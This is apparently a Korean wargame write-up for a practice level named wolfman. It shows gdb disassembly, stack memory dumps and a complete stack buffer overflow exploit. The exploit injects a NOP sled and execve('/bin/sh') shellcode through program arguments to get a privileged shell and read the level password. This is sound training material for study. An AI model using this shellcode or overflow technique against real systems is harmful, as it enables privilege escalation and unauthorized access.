중간에 코볼트는 어디에 적어뒀는지 기억이 나지 않는다;;


[orc@localhost tmp]$ gdb -q wolfman
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:       push   %ebp
0x8048501 <main+1>:     mov    %esp,%ebp
0x8048503 <main+3>:     sub    $0x2c,%esp
0x8048506 <main+6>:     cmpl   $0x1,0x8(%ebp)
0x804850a <main+10>:    jg     0x8048523 <main+35>
0x804850c <main+12>:    push   $0x8048640
0x8048511 <main+17>:    call   0x8048410 <printf>
0x8048516 <main+22>:    add    $0x4,%esp
0x8048519 <main+25>:    push   $0x0
0x804851b <main+27>:    call   0x8048420 <exit>
0x8048520 <main+32>:    add    $0x4,%esp
0x8048523 <main+35>:    nop
0x8048524 <main+36>:    movl   $0x0,0xffffffd4(%ebp)
0x804852b <main+43>:    nop
0x804852c <main+44>:    lea    0x0(%esi,1),%esi
0x8048530 <main+48>:    mov    0xffffffd4(%ebp),%eax
0x8048533 <main+51>:    lea    0x0(,%eax,4),%edx
0x804853a <main+58>:    mov    0x8049760,%eax
0x804853f <main+63>:    cmpl   $0x0,(%eax,%edx,1)
0x8048543 <main+67>:    jne    0x8048547 <main+71>
0x8048545 <main+69>:    jmp    0x8048587 <main+135>
0x8048547 <main+71>:    mov    0xffffffd4(%ebp),%eax
0x804854a <main+74>:    lea    0x0(,%eax,4),%edx
0x8048551 <main+81>:    mov    0x8049760,%eax
0x8048556 <main+86>:    mov    (%eax,%edx,1),%edx
0x8048559 <main+89>:    push   %edx
0x804855a <main+90>:    call   0x80483f0 <strlen>
0x804855f <main+95>:    add    $0x4,%esp
0x8048562 <main+98>:    mov    %eax,%eax
0x8048564 <main+100>:   push   %eax
0x8048565 <main+101>:   push   $0x0
0x8048567 <main+103>:   mov    0xffffffd4(%ebp),%eax
0x804856a <main+106>:   lea    0x0(,%eax,4),%edx
0x8048571 <main+113>:   mov    0x8049760,%eax
0x8048576 <main+118>:   mov    (%eax,%edx,1),%edx
0x8048579 <main+121>:   push   %edx
0x804857a <main+122>:   call   0x8048430 <memset>
0x804857f <main+127>:   add    $0xc,%esp
0x8048582 <main+130>:   incl   0xffffffd4(%ebp)
0x8048585 <main+133>:   jmp    0x8048530 <main+48>
---Type <return> to continue, or q <return> to quit---
0x8048587 <main+135>:   mov    0xc(%ebp),%eax
0x804858a <main+138>:   add    $0x4,%eax
0x804858d <main+141>:   mov    (%eax),%edx
0x804858f <main+143>:   add    $0x2f,%edx
0x8048592 <main+146>:   cmpb   $0xbf,(%edx)
0x8048595 <main+149>:   je     0x80485b0 <main+176>
0x8048597 <main+151>:   push   $0x804864c
0x804859c <main+156>:   call   0x8048410 <printf>
0x80485a1 <main+161>:   add    $0x4,%esp
0x80485a4 <main+164>:   push   $0x0
0x80485a6 <main+166>:   call   0x8048420 <exit>
0x80485ab <main+171>:   add    $0x4,%esp
0x80485ae <main+174>:   mov    %esi,%esi
0x80485b0 <main+176>:   mov    0xc(%ebp),%eax
0x80485b3 <main+179>:   add    $0x4,%eax
0x80485b6 <main+182>:   mov    (%eax),%edx
0x80485b8 <main+184>:   push   %edx
0x80485b9 <main+185>:   lea    0xffffffd8(%ebp),%eax
0x80485bc <main+188>:   push   %eax
0x80485bd <main+189>:   call   0x8048440 <strcpy>
0x80485c2 <main+194>:   add    $0x8,%esp
0x80485c5 <main+197>:   lea    0xffffffd8(%ebp),%eax
0x80485c8 <main+200>:   push   %eax
0x80485c9 <main+201>:   push   $0x8048669
0x80485ce <main+206>:   call   0x8048410 <printf>
0x80485d3 <main+211>:   add    $0x8,%esp
0x80485d6 <main+214>:   push   $0x28
0x80485d8 <main+216>:   push   $0x0
0x80485da <main+218>:   lea    0xffffffd8(%ebp),%eax
0x80485dd <main+221>:   push   %eax
0x80485de <main+222>:   call   0x8048430 <memset>
0x80485e3 <main+227>:   add    $0xc,%esp
0x80485e6 <main+230>:   leave
0x80485e7 <main+231>:   ret
0x80485e8 <main+232>:   nop
0x80485e9 <main+233>:   nop
0x80485ea <main+234>:   nop
0x80485eb <main+235>:   nop
0x80485ec <main+236>:   nop
0x80485ed <main+237>:   nop
0x80485ee <main+238>:   nop
---Type <return> to continue, or q <return> to quit---
0x80485ef <main+239>:   nop
End of assembler dump.
(gdb) b *main+231
Breakpoint 1 at 0x80485e7
(gdb) r `python -c 'print "\xbf"*44+"\xec\xfc\xff\xbf"'``python -c 'print "\x90
"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89
\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/orc/tmp/wolfman `python -c 'print "\xbf"*44+"\xec\xfc\xf

f\xbf"'``python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x

62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
stack is still your friend.

Program exited normally.
(gdb) r `python -c 'print "\xbf"*44+"\xec\xfc\xbf\xbf"'``python -c 'print "\x90
"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89
\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/orc/tmp/wolfman `python -c 'print "\xbf"*44+"\xec\xfc\xb

f\xbf"'``python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x

62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜賃옜릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱1픐h//shh/bin됥PS됣솻
                                                 ?

Breakpoint 1, 0x80485e7 in main ()
(gdb) x/200x $esp-100
0xbffffaf8:     0xfffffe75      0x4005d920      0x400143e0      0xbffffb1c
0xbffffb08:     0x40066070      0x40106980      0x4000ae60      0xbffffba4
0xbffffb18:     0xbffffb58      0x080485e3      0xbffffb30      0x00000000
0xbffffb28:     0x00000028      0x00000016      0x00000000      0x00000000
0xbffffb38:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb48:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb58:     0xbfbfbfbf      0xbfbffcec      0x90909090      0x90909090
0xbffffb68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffba8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbb8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbc8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbd8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbe8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc18:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc28:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc38:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc48:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc58:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc88:     0x90909090      0x6850c031      0x68732f2f      0x69622f68
0xbffffc98:     0x50e3896e      0x99e18953      0x80cd0bb0      0x6d6f6800
0xbffffca8:     0x726f2f65      0x6d742f63      0x6f772f70      0x616d666c
0xbffffcb8:     0xbfbf006e      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffcc8:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffcd8:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xfcecbfbf
0xbffffce8:     0x9090bfbf      0x90909090      0x90909090      0x90909090
0xbffffcf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd18:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd28:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd38:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd48:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd58:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd78:     0x90909090      0x90909090      0x90909090      0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffffd88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffda8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdb8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdc8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdd8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffde8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe08:     0x90909090      0x90909090      0x90909090      0xc0319090
(gdb)
(gdb) x/200x $esp
0xbffffb5c:     0xbfbffcec      0x90909090      0x90909090      0x90909090
0xbffffb6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbac:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbdc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbec:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbfc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc8c:     0x6850c031      0x68732f2f      0x69622f68      0x50e3896e
0xbffffc9c:     0x99e18953      0x80cd0bb0      0x6d6f6800      0x726f2f65
0xbffffcac:     0x6d742f63      0x6f772f70      0x616d666c      0xbfbf006e
0xbffffcbc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffccc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffcdc:     0xbfbfbfbf      0xbfbfbfbf      0xfcecbfbf      0x9090bfbf
0xbffffcec:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffcfc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffd9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdac:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffddc:     0x90909090      0x90909090      0x90909090      0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffffdec:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffdfc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffe0c:     0x90909090      0x90909090      0xc0319090      0x2f2f6850
0xbffffe1c:     0x2f686873      0x896e6962      0x895350e3      0x0bb099e1
0xbffffe2c:     0x000080cd      0x00000000      0x00000000      0x00000000
0xbffffe3c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe4c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe5c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe6c:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) q
The program is running.  Exit anyway? (y or n) y
[orc@localhost tmp]$ ./wolfman `python -c 'print "\xbf"*44+"\xec\xfd\xff\xbf"'`
`python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\
x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜入?릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣솻
                                                  ?
bash$ id
uid=504(orc) gid=504(orc) groups=504(orc)
bash$ q
sh: q: command not found
bash$ exit
exit
[orc@localhost tmp]$ ls
core  wolfman
[orc@localhost tmp]$ rm core
[orc@localhost tmp]$ cd ../
[orc@localhost orc]$ ./wolfman `python -c 'print "\xbf"*44+"\xec\xfd\xff\xbf"'`
`python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\
x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜入?릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱

릱릱릱릱릱릱릱릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣솻
                                                  ?
bash$ id
uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)
bash$ my-pass
euid = 505
love eyuna
bash$

